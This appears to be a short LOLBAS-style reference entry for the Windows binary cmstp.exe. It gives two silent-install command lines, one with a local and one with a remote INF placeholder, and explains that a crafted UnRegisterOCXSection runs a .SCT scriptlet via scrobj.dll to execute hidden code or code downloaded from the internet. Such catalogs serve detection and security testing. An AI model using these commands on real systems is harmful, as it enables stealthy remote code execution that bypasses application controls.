Installs or removes a Connection Manager service profile.
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
Execute code hidden within an inf file. Download and run scriptlets from internet.
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s {REMOTEURL:.inf}
Execute code hidden within an inf file. Execute code directly from Internet.